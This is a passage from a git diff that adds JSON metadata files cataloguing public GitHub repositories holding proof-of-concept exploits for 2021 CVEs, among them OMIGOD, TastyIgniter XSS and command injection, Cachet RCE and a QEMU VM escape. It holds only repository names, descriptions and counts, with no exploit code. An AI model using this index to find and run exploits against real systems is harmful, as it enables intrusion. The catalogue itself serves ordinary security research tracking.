"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54346946?v=4", + "html_url": "https:\/\/github.com\/craig-m-unsw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/craig-m-unsw\/omigod-lab", + "description": "A Vagrant VM test lab to learn about CVE-2021-38647 in the Open Management Infrastructure agent (aka \"omigod\").", + "fork": false, + "created_at": "2021-09-18T15:25:18Z", + "updated_at": "2024-03-13T11:06:29Z", + "pushed_at": "2021-09-27T11:34:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 408167693, + "name": "CVE-2021-38647-POC-and-Demo-environment", + "full_name": "SimenBai\/CVE-2021-38647-POC-and-Demo-environment", + "owner": { + "login": "SimenBai", + "id": 34043829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34043829?v=4", + "html_url": "https:\/\/github.com\/SimenBai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SimenBai\/CVE-2021-38647-POC-and-Demo-environment", + "description": "OMIGod \/ CVE-2021-38647 POC and Demo environment", + "fork": false, + "created_at": "2021-09-19T15:43:32Z", + "updated_at": "2024-10-26T16:29:51Z", + "pushed_at": "2021-09-22T10:47:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 408518731, + "name": "CVE-2021-38647", + "full_name": "AlteredSecurity\/CVE-2021-38647", + "owner": { + "login": "AlteredSecurity", + "id": 71595940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71595940?v=4", + "html_url": "https:\/\/github.com\/AlteredSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlteredSecurity\/CVE-2021-38647", + "description": "CVE-2021-38647 - POC to exploit unauthenticated RCE #OMIGOD", + "fork": false, + "created_at": "2021-09-20T16:29:48Z", + "updated_at": "2024-09-18T22:47:25Z", + "pushed_at": "2021-09-26T04:37:04Z", + "stargazers_count": 68, + "watchers_count": 68, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 68, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 409255270, + "name": "cve-2021-38647", + "full_name": "abousteif\/cve-2021-38647", + "owner": { + "login": "abousteif", + "id": 85574781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85574781?v=4", + "html_url": "https:\/\/github.com\/abousteif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abousteif\/cve-2021-38647", + "description": "https:\/\/github.com\/corelight\/CVE-2021-38647 without the bloat", + "fork": false, + "created_at": "2021-09-22T15:20:40Z", + "updated_at": "2021-09-22T15:29:15Z", + "pushed_at": "2021-09-22T15:29:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 409929982, + "name": "OMIGOD_cve-2021-38647", + "full_name": "Vulnmachines\/OMIGOD_cve-2021-38647", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/OMIGOD_cve-2021-38647", + "description": "CVE-2021-38647 is an unauthenticated RCE vulnerability effecting the OMI agent as root.", + "fork": false, + "created_at": "2021-09-24T10:53:52Z", + "updated_at": "2024-08-12T20:16:41Z", + "pushed_at": "2022-07-26T05:24:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 410625937, + "name": "omigod", + "full_name": "goofsec\/omigod", + "owner": { + "login": "goofsec", + "id": 12970366, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12970366?v=4", + "html_url": "https:\/\/github.com\/goofsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/goofsec\/omigod", + "description": "Quick and dirty CVE-2021-38647 (Omigod) exploit written in Go.", + "fork": false, + "created_at": "2021-09-26T18:06:00Z", + "updated_at": "2023-07-05T11:05:54Z", + "pushed_at": "2021-09-26T18:12:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 771712163, + "name": "CVE-2021-38647-noimages", + "full_name": "corelight\/CVE-2021-38647-noimages", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2021-38647-noimages", + "description": null, + "fork": false, + "created_at": "2024-03-13T20:05:11Z", + "updated_at": "2024-03-13T20:05:25Z", + "pushed_at": "2024-03-13T20:05:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38666.json b/2021/CVE-2021-38666.json new file mode 100644 index 0000000000..f95c4ff2c7 --- /dev/null +++ b/2021/CVE-2021-38666.json @@ -0,0 +1,64 @@ +[ + { + "id": 427206143, + "name": "CVE-2021-38666-poc", + "full_name": "DarkSprings\/CVE-2021-38666-poc", + "owner": { + "login": "DarkSprings", + "id": 90366126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4", + "html_url": "https:\/\/github.com\/DarkSprings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-38666-poc", + "description": null, + "fork": false, + "created_at": "2021-11-12T02:21:27Z", + "updated_at": "2024-04-16T02:40:09Z", + "pushed_at": "2021-11-12T02:32:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437242073, + "name": "CVE-2021-38666", + "full_name": "JaneMandy\/CVE-2021-38666", + "owner": { + "login": "JaneMandy", + "id": 36792635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4", + "html_url": "https:\/\/github.com\/JaneMandy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JaneMandy\/CVE-2021-38666", + "description": "RDP Client RCE", + "fork": false, + "created_at": "2021-12-11T09:42:28Z", + "updated_at": "2021-12-11T09:42:28Z", + "pushed_at": "2021-12-11T09:42:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38699.json b/2021/CVE-2021-38699.json new file mode 100644 index 0000000000..d85cdcfb3b --- /dev/null +++ b/2021/CVE-2021-38699.json @@ -0,0 +1,95 @@ +[ + { + "id": 395445004, + "name": "CVE-2021-38699-Reflected-XSS", + "full_name": "HuskyHacks\/CVE-2021-38699-Reflected-XSS", + "owner": { + "login": "HuskyHacks", + "id": 57866415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57866415?v=4", + "html_url": "https:\/\/github.com\/HuskyHacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HuskyHacks\/CVE-2021-38699-Reflected-XSS", + "description": "Multiple Reflected XSS in TastyIgniter v3.0.7 Restaurtant CMS", + "fork": false, + "created_at": "2021-08-12T21:12:04Z", + "updated_at": "2023-11-13T10:18:58Z", + "pushed_at": "2021-08-17T01:24:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 395458878, + "name": "CVE-2021-38699-Stored-XSS", + "full_name": "HuskyHacks\/CVE-2021-38699-Stored-XSS", + "owner": { + "login": "HuskyHacks", + "id": 57866415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57866415?v=4", + "html_url": "https:\/\/github.com\/HuskyHacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HuskyHacks\/CVE-2021-38699-Stored-XSS", + "description": "Stored XSS in TastyIgniter v3.0.7 Restaurtant CMS", + "fork": false, + "created_at": "2021-08-12T22:32:18Z", + "updated_at": "2023-11-13T10:18:48Z", + "pushed_at": "2021-08-15T23:33:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 396128386, + "name": "CVE-2021-38699", + "full_name": "Justin-1993\/CVE-2021-38699", + "owner": { + "login": "Justin-1993", + "id": 76507754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76507754?v=4", + "html_url": "https:\/\/github.com\/Justin-1993", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Justin-1993\/CVE-2021-38699", + "description": "TastyIgniter 3.0.7 allows XSS via the name field during user-account creation", + "fork": false, + "created_at": "2021-08-14T20:57:00Z", + "updated_at": "2023-06-17T06:16:02Z", + "pushed_at": "2021-08-15T23:05:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38817.json b/2021/CVE-2021-38817.json new file mode 100644 index 0000000000..7b58c4dd29 --- /dev/null +++ b/2021/CVE-2021-38817.json @@ -0,0 +1,33 @@ +[ + { + "id": 396189064, + "name": "CVE-2021-38817-Remote-OS-Command-Injection", + "full_name": "HuskyHacks\/CVE-2021-38817-Remote-OS-Command-Injection", + "owner": { + "login": "HuskyHacks", + "id": 57866415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57866415?v=4", + "html_url": "https:\/\/github.com\/HuskyHacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HuskyHacks\/CVE-2021-38817-Remote-OS-Command-Injection", + "description": "Remote OS Command Injection in TastyIgniter v3.0.7 Sendmail Path field", + "fork": false, + "created_at": "2021-08-15T02:15:54Z", + "updated_at": "2023-10-10T13:09:26Z", + "pushed_at": "2022-11-08T22:31:37Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38819.json b/2021/CVE-2021-38819.json new file mode 100644 index 0000000000..a2ff400490 --- /dev/null +++ b/2021/CVE-2021-38819.json @@ -0,0 +1,33 @@ +[ + { + "id": 563462587, + "name": "CVE-2021-38819", + "full_name": "m4sk0ff\/CVE-2021-38819", + "owner": { + "login": "m4sk0ff", + "id": 52242756, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52242756?v=4", + "html_url": "https:\/\/github.com\/m4sk0ff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m4sk0ff\/CVE-2021-38819", + "description": null, + "fork": false, + "created_at": "2022-11-08T17:01:41Z", + "updated_at": "2023-01-18T09:18:41Z", + "pushed_at": "2022-11-08T17:15:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3899.json b/2021/CVE-2021-3899.json new file mode 100644 index 0000000000..b4eb1e7523 --- /dev/null +++ b/2021/CVE-2021-3899.json @@ -0,0 +1,33 @@ +[ + { + "id": 494653757, + "name": "CVE-2021-3899_PoC", + "full_name": "liumuqing\/CVE-2021-3899_PoC", + "owner": { + "login": "liumuqing", + "id": 1625020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1625020?v=4", + "html_url": "https:\/\/github.com\/liumuqing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liumuqing\/CVE-2021-3899_PoC", + "description": "race condition in apport lead to Local Privilege Escalation on Ubuntu", + "fork": false, + "created_at": "2022-05-21T01:52:34Z", + "updated_at": "2023-05-08T12:33:32Z", + "pushed_at": "2022-06-08T07:16:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39115.json b/2021/CVE-2021-39115.json new file mode 100644 index 0000000000..8c19d5813e --- /dev/null +++ b/2021/CVE-2021-39115.json @@ -0,0 +1,33 @@ +[ + { + "id": 403911311, + "name": "CVE-2021-39115", + "full_name": "PetrusViet\/CVE-2021-39115", + "owner": { + "login": "PetrusViet", + "id": 63145078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63145078?v=4", + "html_url": "https:\/\/github.com\/PetrusViet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PetrusViet\/CVE-2021-39115", + "description": "Template Injection in Email Templates leads to code execution on Jira Service Management Server", + "fork": false, + "created_at": "2021-09-07T09:03:35Z", + "updated_at": "2024-08-12T20:16:14Z", + "pushed_at": "2021-09-09T03:58:32Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 48, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39141.json b/2021/CVE-2021-39141.json new file mode 100644 index 0000000000..d3c6156a36 --- /dev/null +++ b/2021/CVE-2021-39141.json @@ -0,0 +1,33 @@ +[ + { + "id": 399355993, + "name": "Xstream-1.4.17", + "full_name": "zwjjustdoit\/Xstream-1.4.17", + "owner": { + "login": "zwjjustdoit", + "id": 50495555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50495555?v=4", + "html_url": "https:\/\/github.com\/zwjjustdoit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwjjustdoit\/Xstream-1.4.17", + "description": "XSTREAM<=1.4.17漏洞复现(CVE-2021-39141、CVE-2021-39144、CVE-2021-39150)", + "fork": false, + "created_at": "2021-08-24T06:15:20Z", + "updated_at": "2024-08-12T08:20:08Z", + "pushed_at": "2021-08-25T02:00:12Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 61, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39165.json b/2021/CVE-2021-39165.json new file mode 100644 index 0000000000..e039fc6d67 --- /dev/null +++ b/2021/CVE-2021-39165.json @@ -0,0 +1,68 @@ +[ + { + "id": 470280427, + "name": "CVE-2021-39165", + "full_name": "W0rty\/CVE-2021-39165", + "owner": { + "login": "W0rty", + "id": 63255997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63255997?v=4", + "html_url": "https:\/\/github.com\/W0rty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W0rty\/CVE-2021-39165", + "description": "Github repository which contains a functional exploit for CVE-2021-39165", + "fork": false, + "created_at": "2022-03-15T18:14:46Z", + "updated_at": "2024-08-12T20:21:35Z", + "pushed_at": "2022-07-13T09:39:13Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cachet", + "php", + "sqli" + ], + "visibility": "public", + "forks": 8, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 694381126, + "name": "CVE-2021-39165", + "full_name": "manbolq\/CVE-2021-39165", + "owner": { + "login": "manbolq", + "id": 65337905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65337905?v=4", + "html_url": "https:\/\/github.com\/manbolq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manbolq\/CVE-2021-39165", + "description": "Python3 POC for CVE-2021-39165 in CachetHQ", + "fork": false, + "created_at": "2023-09-20T22:19:55Z", + "updated_at": "2023-09-20T22:25:16Z", + "pushed_at": "2023-10-19T09:55:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39172.json b/2021/CVE-2021-39172.json new file mode 100644 index 0000000000..153d03fac7 --- /dev/null +++ b/2021/CVE-2021-39172.json @@ -0,0 +1,40 @@ +[ + { + "id": 537739277, + "name": "CVE-2021-39172-RCE", + "full_name": "W1ngLess\/CVE-2021-39172-RCE", + "owner": { + "login": "W1ngLess", + "id": 113761216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113761216?v=4", + "html_url": "https:\/\/github.com\/W1ngLess", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W1ngLess\/CVE-2021-39172-RCE", + "description": "Cachet 2.4 Code Execution via Laravel Configuration Injection CVE-2021-39172", + "fork": false, + "created_at": "2022-09-17T07:58:33Z", + "updated_at": "2023-11-25T10:04:49Z", + "pushed_at": "2023-03-27T00:37:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cachet-2-4", + "cve-2021-39172", + "exploit", + "laravel", + "python3", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39174.json b/2021/CVE-2021-39174.json new file mode 100644 index 0000000000..6ad6e854c1 --- /dev/null +++ b/2021/CVE-2021-39174.json @@ -0,0 +1,64 @@ +[ + { + "id": 488350819, + "name": "CVE-2021-39174-PoC", + "full_name": "n0kovo\/CVE-2021-39174-PoC", + "owner": { + "login": "n0kovo", + "id": 16690056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16690056?v=4", + "html_url": "https:\/\/github.com\/n0kovo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n0kovo\/CVE-2021-39174-PoC", + "description": "Cachet configuration leak dumper. CVE-2021-39174 PoC.", + "fork": false, + "created_at": "2022-05-03T20:17:23Z", + "updated_at": "2024-05-29T09:14:17Z", + "pushed_at": "2022-05-03T20:17:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 505899527, + "name": "cachet_2.4.0-dev", + "full_name": "hadrian3689\/cachet_2.4.0-dev", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/cachet_2.4.0-dev", + "description": "CVE-2021-39174 Cachet 2.4.0-dev", + "fork": false, + "created_at": "2022-06-21T15:25:09Z", + "updated_at": "2023-01-03T01:56:50Z", + "pushed_at": "2022-09-20T15:31:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39273.json b/2021/CVE-2021-39273.json new file mode 100644 index 0000000000..457e9627b9 --- /dev/null +++ b/2021/CVE-2021-39273.json @@ -0,0 +1,33 @@ +[ + { + "id": 397312292, + "name": "CVE-2021-39273-CVE-2021-39274", + "full_name": "nikip72\/CVE-2021-39273-CVE-2021-39274", + "owner": { + "login": "nikip72", + "id": 49496243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49496243?v=4", + "html_url": "https:\/\/github.com\/nikip72", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nikip72\/CVE-2021-39273-CVE-2021-39274", + "description": "Two security issues identified in Sn1per v9.0 free version by XeroSecurity", + "fork": false, + "created_at": "2021-08-17T15:50:48Z", + "updated_at": "2021-08-22T12:05:10Z", + "pushed_at": "2021-08-18T07:57:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39287.json b/2021/CVE-2021-39287.json new file mode 100644 index 0000000000..36dbbef4d9 --- /dev/null +++ b/2021/CVE-2021-39287.json @@ -0,0 +1,33 @@ +[ + { + "id": 397072152, + "name": "CVE-2021-39287-Stored-XSS", + "full_name": "Fearless523\/CVE-2021-39287-Stored-XSS", + "owner": { + "login": "Fearless523", + "id": 56332039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56332039?v=4", + "html_url": "https:\/\/github.com\/Fearless523", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fearless523\/CVE-2021-39287-Stored-XSS", + "description": "CVE-TBD Stored XSS in TastyIgniter v3.0.7 Restaurtant CMS", + "fork": false, + "created_at": "2021-08-17T03:01:38Z", + "updated_at": "2024-08-12T20:15:40Z", + "pushed_at": "2021-08-19T01:36:20Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3929.json b/2021/CVE-2021-3929.json new file mode 100644 index 0000000000..ba5e2a0d51 --- /dev/null +++ b/2021/CVE-2021-3929.json @@ -0,0 +1,33 @@ +[ + { + "id": 491769512, + "name": "CVE-2021-3929-3947", + "full_name": "QiuhaoLi\/CVE-2021-3929-3947", + "owner": { + "login": "QiuhaoLi", + "id": 45557084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45557084?v=4", + "html_url": "https:\/\/github.com\/QiuhaoLi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QiuhaoLi\/CVE-2021-3929-3947", + "description": "Recursive MMIO VM Escape PoC", + "fork": false, + "created_at": "2022-05-13T05:33:28Z", + "updated_at": "2024-10-04T17:14:10Z", + "pushed_at": "2022-05-13T05:37:41Z", + "stargazers_count": 169, + "watchers_count": 169, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 169, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39377.json b/2021/CVE-2021-39377.json new file mode 100644 index 0000000000..e53083737f --- /dev/null +++ b/2021/CVE-2021-39377.json @@ -0,0 +1,33 @@ +[ + { + "id": 397483539, + "name": "CVE-2021-39377", + "full_name": "security-n\/CVE-2021-39377", + "owner": { + "login": "security-n", + "id": 88956475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88956475?v=4", + "html_url": "https:\/\/github.com\/security-n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/security-n\/CVE-2021-39377", + "description": null, + "fork": false, + "created_at": "2021-08-18T05:29:15Z", + "updated_at": "2021-08-26T04:35:34Z", + "pushed_at": "2021-08-23T05:28:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39378.json b/2021/CVE-2021-39378.json new file mode 100644 index 0000000000..2d514427cb --- /dev/null +++ b/2021/CVE-2021-39378.json @@ -0,0 +1,33 @@ +[ + { + "id": 397781159, + "name": "CVE-2021-39378", + "full_name": "security-n\/CVE-2021-39378", + "owner": { + "login": "security-n", + "id": 88956475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88956475?v=4", + "html_url": "https:\/\/github.com\/security-n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/security-n\/CVE-2021-39378", + "description": null, + "fork": false, + "created_at": "2021-08-19T01:32:49Z", + "updated_at": "2021-08-26T04:40:46Z", + "pushed_at": "2021-08-23T05:27:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39379.json b/2021/CVE-2021-39379.json new file mode 100644 index 0000000000..8c61dda07b --- /dev/null +++ b/2021/CVE-2021-39379.json @@ -0,0 +1,33 @@ +[ + { + "id": 397817080, + "name": "CVE-2021-39379", + "full_name": "security-n\/CVE-2021-39379", + "owner": { + "login": "security-n", + "id": 88956475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88956475?v=4", + "html_url": "https:\/\/github.com\/security-n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/security-n\/CVE-2021-39379", + "description": null, + "fork": false, + "created_at": "2021-08-19T04:35:53Z", + "updated_at": "2021-08-26T04:44:03Z", + "pushed_at": "2021-08-23T05:26:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39408.json b/2021/CVE-2021-39408.json new file mode 100644 index 0000000000..b18e99388b --- /dev/null +++ b/2021/CVE-2021-39408.json @@ -0,0 +1,33 @@ +[ + { + "id": 397327413, + "name": "CVE-2021-39408", + "full_name": "StefanDorresteijn\/CVE-2021-39408", + "owner": { + "login": "StefanDorresteijn", + "id": 2564735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2564735?v=4", + "html_url": "https:\/\/github.com\/StefanDorresteijn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StefanDorresteijn\/CVE-2021-39408", + "description": "XSS vulnerability in Online Student Rate System1.0", + "fork": false, + "created_at": "2021-08-17T16:45:06Z", + "updated_at": "2022-06-23T15:06:29Z", + "pushed_at": "2022-06-23T15:04:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39409.json b/2021/CVE-2021-39409.json new file mode 100644 index 0000000000..fab71dc5f4 --- /dev/null +++ b/2021/CVE-2021-39409.json @@ -0,0 +1,33 @@ +[ + { + "id": 397328392, + "name": "CVE-2021-39409", + "full_name": "StefanDorresteijn\/CVE-2021-39409", + "owner": { + "login": "StefanDorresteijn", + "id": 2564735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2564735?v=4", + "html_url": "https:\/\/github.com\/StefanDorresteijn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StefanDorresteijn\/CVE-2021-39409", + "description": "Admin account registration in Online Student Rate System", + "fork": false, + "created_at": "2021-08-17T16:48:53Z", + "updated_at": "2022-06-23T15:08:09Z", + "pushed_at": 